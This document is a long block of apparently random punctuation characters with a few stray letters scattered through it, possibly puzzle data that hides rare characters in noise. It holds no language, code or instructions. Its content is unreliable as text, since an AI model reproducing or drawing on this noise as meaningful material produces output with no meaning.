@{[}^#{@}!@%}(*&@(!)]@)_@}%+!%}]%$&%][#$$)[#{)[^%]+{{*^&^}}^@%^]^{)[[)][])_+##*@
($!^(#[+$#@[]{*([!@]]}%$^+@#(%[^}@_&@(!&{_)^%&$@^$[&!+^(%+]}@_]%!&(&{^${%*({_}%$
_%})%@__@$_@+)#+(^@^{^@_!](*]%_^^**@_#(*]_)$^]&}_**(+!}@}}}+@*]])&^_[$!!_*&)$)^[
{@@*!!}*_&)#[&{)]**$!_!_*&)+![&+)&^[$#&&!%])@]$_+&+)))!&@}[$+!&**%&*!+(^&[%!*}@$
&[@}]_[)[())^&%#+$#(}^]*}}_[#*_$#{(_+#}&&+%%}{+)[}))*^#^_+!+))&_]#({)@+*%_$_)}!&
{&&%!$)&@%!}(&(]]]%!))#{@*@$&{_[%})!(@]@)${}{[_*^({&!_#&&^#!*{_{&!^+!%{}+{{&%@&[
!(%*(@[^+$@_&}#}#[}{^#({^}!)}*$$}(_(+)*!+)[]#+@(%&}}!)}!]$$^(%_)_&[&_%*#(^%)@[#)
+$(_}^}}{]@_&+}_{}&#[**)#(!#!%_&&_!^!(+_@}%)#[&^)])_#_)#]{#!([$%%{+{&%$^!+_@%(]{
})]#]({][*%)_&^+}]!@&]&_{($^($*!%&#&[!(^@+@!}%]{@_@}[_$_@@^_&![@$+^+^^$!*#*{$[]!
^(!+[}&&@##_*!$%_{+)^%+_)@*][{!]$]#%{[%#(*(+$@{^*{+@#+#&#&+})*+%}[^+_$@@&@$+&}@*
#}@%*}^&_@%)[&@]^{(!^}#_^(}(+{_}$&#!]{%@_^{}^#_#!]*@%)){*[$@&%]_)%}${+_(!*[^{})$
]!*])&}[%&)*&#}}(][]&{+@)(+&^[(#}^*]#+&}]#![@*}()($#{}+_(#[{&}*{$_&[$^%%[$*[{%^)
!#%**!^!&^@}!*@)[&[!__]]^(#&$%#&(@&#+{${%(+##$$[%%%^}@%+]!^)+#%{%%!+{[#}}+!)+#%[
!$${](]}_!&_(^^(_!{#*^{*#}{^[!#)&)!$_!@*^@^^)]@!{{{^[!!)])]@%+({*![@%#%^}))!${)]
#))_&*]@^!!+@){[)][}$%!^+)%#$&]%_}(]$#}*&^_&){+%[)]}}[$*^_+})(%+&]^*$@[&!#}%}}(#
}&]#)&]^$&[^%[*)^&(]}&+$@%^]@)+!+)&_})*%(_+]*_)#+#&_^{#+!!)(_#]*[%}]*!!@)%()![%+
{{%$^)#^+[+^}#+^&}}{%%+*(+}(&%}%}){_&$]+)+)^#^*+@[@^[!^&)^!@(}{$*{*&_{@$&@!@#{!{
$)#![*]%+#*@$_^^!+&!]#)(#*$*%*@*+(*#_^!@&*]+{](*[+#_@]%{#[}^^%}[_}$+({!%+@@]]+&^
(*^(_@]_%(]+%_)@]&!{]@$[__)@[+$)%$!^{%^!)}]{[[(+*[&*(_^*{*^}]){[_))!(%!}$![#^$+&
**${*+{$!^$$]*_%+@}{{(+_&$+*)]*@&!$#)*]}@@%!(#+){[!!+&)$$){#_@&%](^#]#}$)^*}!]&+
]!%![_)]}){}&_$]%!_[_{%])#!#}%^{{@*$_@@%_&)%{)*}+$#{!($!{{[!@_+(@_+!$]#][]}{{%_(
(!_*$%^{@@^#{[[!_[&!)}!&%#$[+#]{](&^*%^@&})_)*[([%($^$^#*&%_*&%+$)}@^@+^#@%^&+^*
+&#@%&](*@}&}#[{@@]+))&^#%!#*}#[+{!^]*+&{^)&}{#+}@+!]$@(&(##)_]$%#_+![}_}}}(($*[
)^#^*)_]%&%)^]_)!(+{^}{#^^]{@^_&#[^^&!#+_#]#&]((]]}@!#()$*!){*((%+^]+]_&&}}{(]{@
}$^##]+^$(*_{@%{({($&!_])*#(_]&(^!!)@{[^%$_{]^_^_[)%_]#&{{_#$&}{]#%){_&{_%!&[@)]
!_${]*[+]}&$}@[[_}{#_^*#&}!+^{}#+)^%]{*+($({}^*^]#$+%+]#}({]{{*}{]&#_@&+[+]${)})
)&@*+@])](_%^#!))@#%)+!(!^@%[}{{(^}{}%&[$[+&$+}]!$%_[$!*]!{]^#@)+))$)#)@^^&]+#[^
@%_%*%)(}&%!%]%]$)&!]!}+)*(^&+&}@}}+]{^@^]^!$)+{!{(@]}]$@}])}}{%^@]#*&!!!%^&_&@@
&)}$*(!_*&!!(})(+)([]!]*^&+^^#{@*++}*+&+@!##}[$^_&_%(%&}*!]@}$]}]+))(!@@+^+{]!)%
^$^}@!!_$@{_{(}($%%{&@}_][#@${}&}*_)}@%)!}&{}*}@@(*&{+)%**&%]^}&(!_&]#$(}[#^[)#^
{@@#$&]][(@&]{_&[}&*$+[(^][&^][%*}+!]#%{!##$*{}++}+{!(#![@^()}!+)&**{{[**&&$!@%%
)_#$&()$+[((_}]*!!_[*{*%[%+&$!}@({#%@%[%!%[!*](]%^}##@(*)]{@%@^@^#(]^[{_&&**)^+!
*@($&!+@$]@_]&!(##@]&#]+*%[}(_@_@+!+^+$&(_!({++[#@!#(+_^)($&^*%(^&#_^!^^(+}$+_{)
)_{^%%$]_!]$+@^[*}^*]+_$$&]^^+{&&&(}[{*^^@%%+)[^+$&@&)^%&($}*!&%#!*&$[%(]_{$])*[
*@}@*(!_[]{)@*]][(^%(##]{+&+$&($&^@{@^[%*+((%]$])(#$[%)#(*_#&^*$*+_[#{{{%{}&({+$
#$)&$!]!^**[)^!!@(][^$$$(*@*(*{(&##%_%}]%^)*^%#$_($_@(&+#@{){{{_^!#!!*#$#$_]}*^#
!{&++#^({{@$$@#)&*%[!]$&{^!%$+)}]_@+{*_]@)]{*]@+^]$}}]&)]#!_)}]@$@_[&_*)+(_}%#u(
)^(())(){+@]&+_){(_%!{^^*^!)$+{+^#!}}]_[}^**(}*%($(+_%]))${)_*%&&]$!%^))&#({]$^$
_&**[_&[(%@%**)[*$[]#_&+^{@_&!{^]%#_)![]![@#&[}]_]!+{}{$+_((}]_{!)})%[*$^(+^)+}*
_{@@@@)()#)@&[]*(}@%%@[*][(!%$@#%($#*]_[(*!{]+)*#({*{[{%[#{$^)]%!+#&](__}(]%+$&(
{#${$&*$]#](}[[[)($%@!(@@^_#^&})_(![+_)}_%*}@%{!{+%@_(%&{#])()]#!(]%!$$#_*%@%_*[
}@$$)%}*@^}}{)%({_&[$)_}^(&!#)!@*%{%#^_@$)((()^)$@*@%_$%)*$(!$]*#*#+++_$&}{^]$@]
!**$*{[}#@#{+}@$]]_[)@&](]*{]#(**^_!^(@^!#**}#}+{!$@]_]@!&}}*[#$}!!]{[{]!_{&!](^
[()[)#$*&!^[+%}(@{*%*{!}!$(%(#]^]&^#@!$)!{}#+&{)@)[*]($)@!{)*^*([{*}}+]}$++[%+^_
}#^+@[%$%$(*]_(*&]!+)[#}((([+{]##&%!)%{*({@^*#!]++[!^!#+@)$%*!_@[{^[${$}#{(}#)_[
)^}(+{(++(]}#@{&^@^_}!]!]%+[[(!_]${(*+[}*_@_@*_^@^_]+!)$)!)]*&*$}&[+[)%}#%^))]%^
+($@!]^[_%$__&@+[]^%@)[((]#&$&+}!+(}$^^+&{!)&@$$]}!![$&)&][+}+)#]#}(_@@^*!)_)[^$
@^&$^@*}_[!+^!#{^}!{[$[{{++^[+*##%+$(}{[^%@[&#!!*+[@(!#+){[)^!+_[[***+#[+&))*#@{
@{}#^^^*]{_%]+@*)$*[$@]#]{%_$_^}$&$]@]))#((*(&_@$[)]!%_$#]({&&[)])@_}*@]^!@}}%[{
)!%}_%!{^]_{&@%@%(+#^+}]*#)*%$%{%*#(#{}@)}([%_{^}_]#^[!_)&$*+{))_^+%!+}[@{]^+__#
^[_@{[%*@+$[*!$)$$&#(_[^+!)(^%_[{&}$]^}{&[!$[^{*[^)#@)(_(]#[&)]%[+@)]_+$_{}[@{)+
_+&]]!@^}#^&+@[&[%{{[)_]%[_^%**@}))]^*_}@@[}@{)&}#[{$!)}]%]]$_!!%!$@#@^()#]+%(&&
+%@)($@)@^^^]+@_)})#)!^_#!@{*^!@*%^(_^@!!$%!&_+}((%(#&$$#}@#]^$+]$@&)^%}+)!$)&&^
!#[(}$}((&*$&+][++#]^_%!]]&+#%}&$*%*#_(#}+!^{[#!$)!@%_!!()(%!(_]{[$*!^+#]^{{}+{#
_{*{+(#)#!@+${+$@]&*%}_+_@](%(*_}}+^(}$${}^!%}*#&*__(${(]}%^[^(!}##@@&)}*]%)[%$+
}][#{@$)!}*_{&+_{!]**($_[@^}&+&!(@%&%$)$_(!$_{^*]}+_](&^{!%_${@]^}&]%%@#!+%(%&_@
$@]&&_)^((}{}&^(_}@[]_^%&^)^)_@#%_*]&&[!}()*!_(@@+}@($!%^)$!]$%{[^[#({[*^^#{@_^}
]+!${)[^+!$*#%#{!#)__@$_^}&#{%)++)_!*{){_*]^&}{$[{(^{__+[[)@)@#%_%$^{@_}{}+$^)+@
]((!*}^])@!^{+#%%{}+]{[}[![(^#{_}[(#_]%+)}*&}**]@*}]}[(}[{{#*+@#$#^)$++({[^#+**&
]}++(@!&^!#_{[&*!(![(&@{(]!+{(![$^&&}{}&{^*])#&)^#{!]&+)}@_]^$}@{+(#@[([@[++_#_[
##(]{^^%{)*)!$#_*@$({[!))!@^*&@&(]+([^(*!+#@[^^^+!$]!}@+&{_*&{{!)}(!@]%_(&+[__%)
$]]%++!!^^[$@(&@(%^!@!$)[{[%@))&^#}*&+((]([_^&}%!&+^*@($}}$&[$(}__{)+][%!@{({$]&
$^+$#&*+*)!!+_*}&$&^#^*+*_}{%$*][#!$!{#*%%(}*%*@[](}][+)]@{#]($)[_#@^[!]%}%#[+[{
[%{*]&{${#_)(+%^}$}$}#)^^#($##%@{&}@){+*!+!%^{}@]%!}#*_^#+_&&&##^^[{})*((*{!_+)]
$[@@}#[*%%_@}({##)[]%&]_]_[#(](}#)_]*#_)}%$[&}!^!)@#&*)&@%^{@#{@@)}{$)+&%%%](^${
+@##$*({+#_]!_{(]{!}%$&_})#($(_]*%+]_^%)$_)%^^!+{]}}{@%$@$+!]_!([[$(%)!$&}[%]]@}
!(@}]{^^*{#*&(^}${!(]]^^%}&_%(*#]%!_$@}($%@(_#{!*@[&+#!{{[^]!#{${{*{![(_*^(_]%$[
@(^$_)@(!^@@#{{]})]*]^^*@][!@&)@^]%(]_$%${$^)@)_))][*^#))@*&%_{)}^_&&__#!*^&)^*_
+*!}^^{}{([&#{}]}$}@!%[$@]!#!+!^({))$}]#{&)!^)@}${@%^]%}#$%+^*)[&^+)+)@@#_^+)^&*
&[^(({{*)_*)++#${[&+)]$&)]_%_&%&{!(}_}_}^[)]_@@&(![@}{{$}+#+^@%))@$*^)+^+]++&&*#
@)###%^)&][%*_^&()%*[@^+%$@+@{*@([_+]}{){(^&}$(#[*&{)]&{$_^@&&}(+$@!++%*!+%^)!#[
#]^}{$}*@#@$$[]_!+]&+^@@){#&**}{{[%$[^!&@])&)_]%(!{*#@]#())+^_#{^](&](##[&[}^&%@
({[!+@(]$&]&$[}+(&%%[!!&(@(*$*[}$@($%*}_]!_@!^_((${[}^%}+^**@%{%_!&$}$_)&*^^@&]!
}*!@!&^{^}*@#[){%)%+]_$$+%$[(@){%*{++}$&[^&{]&#&@{#[]}]%$__$@^+$}*%))&!%!**#%+**
$}&@*&*}^+^[&]}[_}__][]![&(!![]!(@#@&**}*([}*_}&!{})*_&$_][]@[@[)__}@]*]+]}^[$%!
!{_^++}}))$*%!&}#[@{[^&&[_{!)}_]%@&+}}+[[&+}[[+&&!)!_{{^&]%*+!@^%$)+(%^+*^[+[]}*
]$#{_&_){*_@[@{@}{(^]%^%&(@&)(&&@[*&*%@{]!)$^^[[^}$#!$&_(@}%^()_+!)}[*!){}!(}*)&
@+([!@{+{$^*##{(^@$#+![*}#$[&&^^#_^#%$*}#*+^@[]%#$@^+*)*#^$${)][#)&)(]^!@)!%@$]&
%]&}!_%@*#}#}^&#[[!*)(#}]}])])+]#($)%]_@$(&(%][&)}_[@%^!{&!+&]$&#@+[&!^@^%%$[#%)
#^%&{+(+^$+]}^(!}^#*}}&)*)$(}*&&}$@@#&!&[]_]+*)!)+_%))}%_&!%_$_+##^(@^&)%_@*_(&(
}$]^@(%(*)((_^!%}%[}__]##+(_@{%%+*}*(^}(%)$}@+@_*[$+%*+)$}&![)}+#($#{@^##%!}!@)_
_)}}%+}&[+%%#_}]!%_$%#([#*](({(_$[!!}^{$_@^+(*_[#)]!$_^)*)!_}*$*$&(]!_[+*+&_*)*(
&](]&&@+!@$$%{]+(($@&)}%}$]_{{)&*}%+[}($$&%_#]%#^^_}[+#!+(!#@%}_${(!])!]}{%$%%*]
[)]}(_%]]!+*{+]_+#@)!{#()*__{+^^@#!((}#()*[${#(}^**[^+$&&*]_%&{$]!%{+$+)*}[&(}(#
++]}#[*%$}[$_$([$$}[**!!%{*&[$@^_&$$*#{![&^($([%$@{{{@))]#_]{$([[+[%#[^*{+(_%$+(
^$(!$}[(_^^}(&#*[[@]*[[_#]+__+*{_*)_&()@!@}#[++^!#^!!&^*((@%%(^^{{*[&+#(+&][{*){
#++!]%#_!+}@^](_]*^!+$]*$[^_[*&&@]*$![%%{}{&%{}][+(&}{)(&%]^))&}^*#_+$+@_@*#%%[$
!#}*!(_]+$@_[@%^(#_[*{!!($!)%+#%)%*%@@%{(!##*{&@#*{!!!)^(___*]_[#!%^[!*+!}%{#]($
}^+$]}$)}^__$)())@](@]]_&!*[&(*^_##$_)&)_!${$(($$$+$($)^#$(*}&$$)%]*{%@%(!*]&^[_
]&*)](}{%$]}}%%]!_*{(_[]([^[@!}[[$^!}#)**%#$}#{#&%!%![_&(]^_#!!{+@+*@$^#+#@[}%*%
$*%%{^^(*#*+^}{]]^&^{!@$*&%{%^)]$[_${[{^!(+{_*]@]}{%^}^$%(([}[+&[]^&^&#^)^$}[!@[
#[&[_##!&]*_$%$&^++^!]{%*&$%%)+%+!+({+)#$&@$@@*}__[@&{++$[$_](*_&{{_^*)%^_$@^{#_
@**]^)])*{^)*@%^)+**!%#)%!(_#!)(+#!+&{$*]^}%]{!_$^&!_@_)$%&#{^@^&!#&+&${#]*_)]^]
#%_%@{}!+&#}}$*(){}]_))%)}}_![}@}(#}#[}{[#^%#_*){_$&]!{#(]^]&[!)&&}(]^$%_(^{)}!+
)##]]}_@]}__{#}++!{![*^%]{]]^}%!{{&@}!#&[^$[}]{%$)({#(%@$%[(()#^]%^$!}$$$&_%#&{+
_(@%{}(%#]*^!@$[&^]}&*&}%%%^()]!((_%^{$[_[}_$$+&^%@@+%[(]+{$+$_^+#*%[#_!%)!#%_@%
$)_!]&*[)[{{]&{!*[*}#{*}}!&_+$!#*)[})]%+{#$+}@$&+_{$%{)&$!{*}}]${#[^{#{%{{+)@+_$
[{{[(^[[!}*$!+})+^$*_!+_{*(*#%)]@${*(#&#{{[!%*_(@([$(+$#(^*${[$%}}&&@#)^*!(^&[^$
]&#@^][*(^@%]&#%@((]{)(@@}[^@[*@(}@{%$%{}&+{+^}^)^^&!%!@_!*$![^__(+[(_$}}}*#^})*
)%$%@_#*#}^!}}^*$+}%}#]_[]&+{$]%(_&{&[_{^^##!$^*_+@#&@{_)!)*#(%[%$_(]{@_(#(]&#_[
[(#%]$+{#_{){&[$%%{+&&$)_@*%(%(^^!$)__%*&$$@@])&{%[_&!}]%]_[(}#}{_^!(){&+(]+{#__
*@_])_&&%+([!(}&+(#)(&)+$(]*(^_&^}{^][_&^#(_@[!%[#]}]$^+(_&!&[)_^#^!}[{]&}^#{%^$
[)${]$$*^}+(#%+^&{%*[&&%*_)@{)](](+)(#$_^[^_]@*!&[(%]^}%{*)_+**@(%*{^[&[$[@*#}+]
]@$*+%)(^$$)#}!}[@)%{+#$%##@)%$))_)#{!@#)_*@}[[(#)#)*+]{[(_]$}_@{*$$[%$]!^+&(!([
})}%((}*()##)%(({}!)[_[*}*#!}*{]!#]}^][))_{%[&{!(@&@%(]{*&*)()}+!)@}%}+!)$&!_]]*
+&*%)@#!##@&*(_^]${{]!$!)*$!+][[[@^]%^#{&%!+@**&}]%$$[]!!![+)}%)]](![[[![!}*^###
[^*@}@})[%{_{_^_((&%^{@#%}()$}[&*{]*])%)@{]#((&#+)&+&_}#+&]{_@#%[*)&+!@!^)+$[@![
^_}%@#!)&$#!%)%)***+_$+(!@{#$)&!$&_^(%!*(^]^]^^(&(]@^&*(&%_(!@*({%)&!$_]$$((**@+
])_^_([{{()}+}&$($#&$*+#&$%*^}[@*@@*[^+)&(]^)()$+!(^@!!*@]*{@^]){_(}%*$]$#@&!$(^
@*)*%*_&!##*![_$_^#+!}{!&]+%*@^#^[+({!#*%@+^*@!+})^$+[@@_](]$}($^}^$&*}}$%@#!%[*
)[*)(%(!}*%$_+&(^$[_$%_]]+$#{)}_##[*&#@[@!(&&$@{!^^%%_@*($(!%#[}[!$[__{+]*$$]*@)
*)(!^)&($)*!+^^#)}[&^!%&#]({]&[%!$!++^))&_%}+]#{%)}%[[+[^]+#+})[]*){_{[]#)_&^[{*
[^+$)_&%(^+_&*(]]]^^#{)%^{@@&*{#+_)^}^]}_#]%_[##@)}[*[+_(]{*&#$$#*(*)(_}}}@[%*()
^@)[$#[($_]{$%[&!(&+!]*(&@!{%(][*[]${#{)}+]]&@)!$#}(&])#^^!)%!^_{}[]_[@{[@#[&{(]
@{)%_]#*{%^&@%$[@((*)_%!#+*^]]!}$]+}^]&$#[}{$*#^$$_{{}}@[@+@+&}}^^@[[@@})()(@&)[
$&[}#%&%[!!$_!(}!___!#^%)^[${#_&&{&])}*]^}&_$@{[@$@&}[%)!@{*%&*}%%&^$^)}^{}{&_+!
__^}[}+_]$*}[^$#@%_^&{}!}&*(@)+^{@+[_*(!@(}{#][+&]}&_)*]&*$*^]@}+$!#$(@{{%([@+@}
*{]_@{*[[($@]&)#_!}%)($@@)$+{)(*(#{&#{!&[&+](@*!#)}%+{(%$#]&[))@{(&*@(!&[$#*$*!(
^+#%*}*($[%@{_#@!&[&&{[+&&%&!_@%#%$#_)&%@($+#@!{+[(]{^*^(^[)}_&_[}(#[^*%!+)@+%^#
&#$#@^}*$##@$+#]^%}[[(]{+{[#!}$)(##@(_)#^&%]_%_%(&@)!((+!(]%#@#)!&][$[)]]*(+({@_
)}%)+*]%#${(!&*&!$^){^})$#}}^%+@$*_])}%@(&!#&%@@+]]^^]_**)^]&+[$_%]*__*@}@)([[@^
^#%!^}!&%%&!$+&%%$#$#$^**]!]+#((#_^$&#()(_#_{}}&_#^+++#_)@_)+@%[+(+![^&#][%**$+#
#}([]{{]}_]#$]}$$&}_%$([%$&#[#]+[_)@([!+${)$}%*{%!)##}*{&]&!#^$*}+]_&#}{]&#]#&(_
^+@@+##_]]*#^_^&%_&@!$[}*&$+!_@*)$[&$[*$(!^#@#+%_*[^{@}]}#+]}&!@_+)(++&&(#{[#*@{
]$]}(]^*!%@]&&!%&})(])+@^&@$@@[(%*@*^++^$##{[$^{*$&{@$!%^@$_#]$_^#@@**+^$%)*%%{]
(&[[)*](*}%*%@+$${&)_#+^^]@$}%$]@[]$[_@]^!]&&+[[$!%{_((%&{@[)_^#)%!](__[)+_**$(]
$##&(*[#)}[^&%[@@)*(()_#@)[*#%!&}[)%^+@+{)[++}_+[+])&#^!)+#%(@*]$*]$_^^#$$%!_*&&
%$){^[])&$@{^@+_]([(])**)](*+$*{@%]+)^*+[]&+%%[(%&#!{_^%#*[^})*$]*%^&*)+{(%}#]_#
{($#&!^!{[}(}@}}{%&(@!+_)]!*%)!(^!**!{!({}}}&{%&@#({_](+}##@$)!]^!]#!^^_[)%}@}))
[#^#}(%{#*%**{]]((__)![]^+]+@__*_{)$*#)&][!)_{&$}}#_$#([++{[$*()_**#_#%_$)#]*%_(
*+^*(}*$_%[${)+[%[%^#_]&*+{&)^*{**$[(!}*&@![&({}*#&@_&$)@$]!*@}}&{%{*[}+]_%$])_%
%#+&$}#&_%&[%{+[{@_$!$])!*#*_$($))#!+)))&_[^!&)*}+)_){@{+(&&_^&{]$&!%_{*&&!#[+*@
]{[]]}]%$!$_]]%%$@^](!}]!^[!^(%$%*$]&)@%!#+@@**$^%!*$$(_^[%*!)^$]^@_#}@(*}){({+(
$}^%_]#$!#@[@])[_]*[]_+!(}([]$&}{([[&&}@$@*+]]{&{#[_{^)@&@[$(#{&{$]!$#_#(}^]{+_[
@{&_@[#&^!#!%%@]^]]@{[[@](]][)+)^%![#%@%]%&@)[@@]^[!*]&!^+^!]{+&#%()+{@$)*{#([^(
_*[*#^@[&#@^}!@%!)*^%!]]#&%@$&^+{${^(]!{[%[+_}$!(]}!+&*}#}@@#}[*$*}^^)#)&_!![(@_
__&([^$)+@##{**%&!%}$)@(+*])&!&_![^@)}{!_}}*@[!^^)]{$%{+^({@$*!((*%%}_@)_{!*%{))
(*&)$*)#_#&%%!$}_^}+%]${}&($}!]!*()@!{*)%%*%}}_^_*}@@_}%&^[])*(_}_#_$@(!$*+#*)+$
!+[*[%*+([&[*@&_]^$]&_+^^+_@]_+}^*@{_})@!%@_!*&^!((}!__$#*)!})[))[{^($]@$@$($&%)
@#@%!!&*^*&@#*}&[(@#&@(*!^@{%]^{%&!}#[%}%()%!*@+&!)]!]^%{(^!$!(^@+&$%)@%!@_{[#[%
)#]**+*]@}!&($*])$}![%%%^+#{]*[$@@){@_}]@([}{](!&#[%_%}{&#^%@^_!}@[${&$&*$)]#(&_
{{*#[]+$%*_])))^+#*[++#*#}$]@$#(+[_]#]^(_^#)_%__![(%(&((^$*%%&])+)]&(&$&#)]()${&
_#$@)$@$@@})[$_([(_^[+##)@]*(#^%(%(${[&+#)@^))[^#$^_(]**&%+%&(+$^#[+}))^^]_%$@#[
$*$%}*{!^[#@}&{&[(+@$)&!$&#}{]]++#]@!)[&@[_#)!!%){$]&)})*@)[{()@!)@^(#@]+@_$&#*@
+^{}^*_&^$*(#^!%)@()@{!%%}^#@_)#%%_%!++{&(}{}}%{++}+&$]]@)@(+{()][%*&_*!!#!@[!]@
]+*_^$@&!)+!{+{}&_&))@&{{++{{}@#[*)%%$]{%#!+#%@@_*}!!)&%!{{($$&%[*{[!^**&[_[_+}^
_$]^[]+__${$@%&@[^}}#}+]_#(@_}+^+%^##]^$_{@+!_$}##_@#&{@_++@)*${*%^))%{}_@@&[)*$
_^]}#&(%^@^+[*{^}{_*)%@)$$#[(+(&^]#![{^_{([+&(!*^#&{$}@#(&!!(!{({^%%@!{+{)])^^({
(+{_%#(%)%(**(@&%$*#_+$^^!$)!$$%*&&%&[^[+(@$${!@)$#_[^}{)_%!@&%{{$*]@&%){[}!!^}+
%+[!*$]}(+#@*#&&[_)!*}&*#&#*^@&[%(_)!&+#^{#%#((+#+]]#@]$!!$@@!@[{))#()}(}[^@*)}#
_#[!^${]$)]_!@@+$@(@+^$()*{!{{(@#+$&*@_$&@*++[][%]$[(@{]+}}$*{%[%#&%)]!}(+__$]_*
+][}!&^*}_@!*}*#()$^&*%%#{_*@_+[({!_%_]!^#@(&@$&]]%%+)!]_{&[}^^)!#]_{$^({(^**_[$
]}@)%_(!##]#![{]%*((}$)]{}&(%{{$#+&)_!#)_%&@^()%*@#%&!%+^_+(+$@($&^!$_$%()!!_!(*
%(]^_}^#$])$]#{%@*#%)+}([^+*](!_^%[]%{}!_&+[$@*%{[@*!{}+^(@@&)+!_[^}*${@)^){@_&$
!*_@&+!]^(*#^[%&^%^+%}{[$^@]!$^{}{(()#!%@]{]}(!)[#(*$)$()@*{@_!$*#)$*+)])^{!}{#^
]]${!@&&^!_}@^$$+_(@%_[{##%@*]}[##@${$*(${(#${)}{}%#!%#$
(#}&_#%!+](!$@)}##[^!#{^}&&!)&+@$^$%!$^$}(*&_&[(_(*]{$+#@_($@_}!+#({*(^@(_([_#++
}[&&*!%)#!@&(_[{{+}@)[_^!&($)_%*%){{!^$_*^]@%%+@&!#}(%}#])&(^%$$+@%_#^^%+[!^}!)!
%*!*]^!!](@!([[]@_(#}*%&}*{}%&^($+!*%^!*[!_$_%@($^$[!#[^]^}}]!{##^^!(#++!()$$([[
][__{}(&{!{_[{+!{*(&)[^}!@%{]()_^$+&_)!&$[#_)(&%!]$^+}%]([_@{)*!^#^*%[!^*!*#}!*]
]{&[+&$@[+%@^$%(#!+$*^]^{#!&{^@]]@@*[@^%#%(_+{}&@(_)+)(+++^#})}!+@)^_#}_[{^&]#%(
%(^]^]$(#_*_)@)@!^}(&_$#]})^(}+#(_}$]@$&#{^}*!*]{}}{^}[#^(^]}[)+@^{@)^@{&**__]}]
]_}!%$+_$}#&_%)%[*&%_@}+&+&$]]#(([+([{*[{$+!@[%{#^#$_]#){+$%*_&%(+##$_}%[}!%!&{[
&@^%&(%%%#[^*@[*{&*![[+$){!)%#_*(]^#!}#+%)&!^)*)({$[^%})^}}@)}!)+^_[_^$)+)*+&@*^
%!!#!&}!%+[#!@[#@__*](_*+&^$]*#}!&*@*[*{)%)$*][}^!][_@*]*}&*}{%*((^^@+]&_%#[&}{^
[[!+}&[&}$)@{!)&*{*[$)$)!{&!]#*[((!(]{}]#![)@&}]{_!&{]({$_^*%]#{_]{#]!&*#*(_&)@}
}+^)(}*^(+)+)($)#])^{%#&()!+%$}(+$+#*[%)*@!([$_+[}&&!^&$[_]][{%)[#%$*^%#$!*}+!$(
_[^}{$%@$))_$]+[[##%$]&+]^]!)+^![(%+{&$%&)_$[#%_%_{*{)({{&+^@_(&!$&!![[!{%_**%%]
&*^}!{)]^^[(@+[{!&%%$[@]&+$&[)({{#)[([({{#!(](]$!$+#_[@(({&+@}^}!!{@@**#_*_]$]](
*&]]{#)%%@{@$##[*][@#$[(@+()%%!@^]{$#!([+#@}&_)#_@{&{[#_}+__*_%+__+&&*!]&#%*%**&
###$@{#!+[){$_}[{#%$@+[{#)!#^}[$%}}[@_@%+!!}*}]$)#)@%^*]!}_*@&)@!]*#*_}##^[#@^%]
$)!_%&*^*#!{%&+%#^![%$)*@%*+}+%_#[&_&+}(#$+#@!#!!#!%$@&+[@[#+@@+[_^#}$&)}$#]]&*#
+*!@!#(+$!][!}@![$[_)$$&)^)[[*{@])}+^(!&*#%![(*+@+&_[)+)]$(++($+)#]}][]{*@%&@$$_
*+})+*&^_*!$)#@_%&]}+%#(&${$+(@}()](^}&!&+[]^[#()+!#^_@]{*#{{[_]_[*)[+#+^]+&%&!!
*%($)_@]%)_!$_*!*@(_$_^^^$)}{&!@)%({(+(&[+%&+%}_)(#]$!!)%[!&+)*@%+}])$}#&)*[!++}
*)](+{^!&$)_#[*&^)))[#}$({(}!+{]#[_{[}*+]!@[*^%]&{^&{)]#{#)&${(]+{$])&@]{{)}&_$}
($^$+}[{#%]@_(]@@)(&!_$}[&!!@{!%%_&[{[@&)&$_${%_*%%&@+#+%*!$]}])^!](+_)[%{^%{+@*
&%+[%!{_{![+&[&!!_^_#^[%&[[}*++#!#**}{+}[+&+_$^^]}^^_{$)${!_)@_^_[}*#}&{!*@$#}}#
*!^+&)%**}*{@#^^$^*)**!@&]]#[@@##%}@@[(!)!}*)%@+#+**)_%^&#}(+]][(%#*]_(}&){#%*#_
{^}_%*{^**@&)[&!#_#){@+@}&$()!][*_**#(&*{&]@&@#^${&!]}%^*@)!**&&(@^()@*!_$@]@($+
}]{!}#]$[!&&[*(!]!$))%+$%{!{^[^[$@[((]#!%@)!]__+{}%{_^_!{@{)^)+&%&!^*{_&$][!]@_%
%&!#a}#+#^#{_&)({%!_]!_][}^_%*+}$)&!@[)#@{@[%*!*#_[$$(_[+!^[[[[+*{[*+{!#&*^@&+%)
%#}&)#%*]!@#_&@!^{@]#)_&@){*#]@{@}%@]!(}$*)%#[)^{)}&#[]@}%+)@@}#^#_[]*(%@)!)#+@{
$}*@@[})+(})}}{@{%{%*{{%*+^*%]@]{[^[_&+#(&_]!([#&_[%]![[_#)&@%&]!$_&#&^#@^*+@%))
{{)!%[$#!_[@!(([)++}*)%]@^#![!{+$+((#)+$_^]__]+_^@+_}[%+[{()_%!*}$+[$#%%%}$%]}{&
^+&)^@)$%}]!(%^%(]+!^&_}_*%@]((%%&!)[*_([#{&!)@$!!!$){(&$}&!%*$]%&{})^+}@]@(*(*!
[)}%+^_[^%(_%**{%({{$]}[*_)&(*(+{@!&$%{!{#*{!%{)![_}%}{[!(]@*@#([(*${*[[*($+!])#
@}({%&@}#_^#+_^(*+$)$@+(^[$*#!{_!_]}!(#)_)*(!{^(@(*!#$){[#]&$^[+]!%_}+*]}}}%^_@#
+@&][&^[[&!]*!)$%[#*]!*[*^^(_[*]^]!+#$[*##!!__&}^&^(^*%!&%{[**@%$%]}+^!]_#&+@+[{
$$^@)(#(}@{&*}^$!![%^$*$##^$#+)&[%+}}#[@!}!{#}+@$*$+{}^[)[]^}!)!])]^@}+{^_%(@*()
@]$]!#$$%)())+)}_#*)(_}*@](^@!*&_^!$(!(_!$+@*[)$$*($)+%!{@_}!@_+}+]@(#}[^%@(][(}
(_@^&^*)[*$*)+&$@){]$#^(#_({}**+!#${()_)#^+)&)*[%$%@^]})#{+^&*]_#^!]!)][#*#%!_%$
]$&@@&[!$(!+_^#*($(_]]{&+!]*_)!$_%)*}&][[+(^]_[{[^^$*^{*!#*))!{@+{#$[+(^+*%(+*++
!+)&_)*}{!!#$_&%%*]&}+*&&}%}))&#($##!$!#**@^%]{##$!)*#+@(%))}]__[^$^})_@)]@*{&[$
)]^_!#]%&#[}}(][+}^^_}{@+%^[)$@%+_(&{*%*)]_@+]($!@*[)%#$]}#[_$!%_}*)(*_+}_&%&{})
&+(]({$]{+%*}]@&(([&(&^&!@{][^+^^)!@#[[%_!@^}_[(+@!!^+@${[]%]]@&[{}^)+()@%&}#!(@
[!)*%)^!}&(}+[(#$^@*}%_$+)[)}!+^](+__@@{%}(#_#)[%[([$)*#)@&&*&#_$}{!_+_!$_*_)&@)
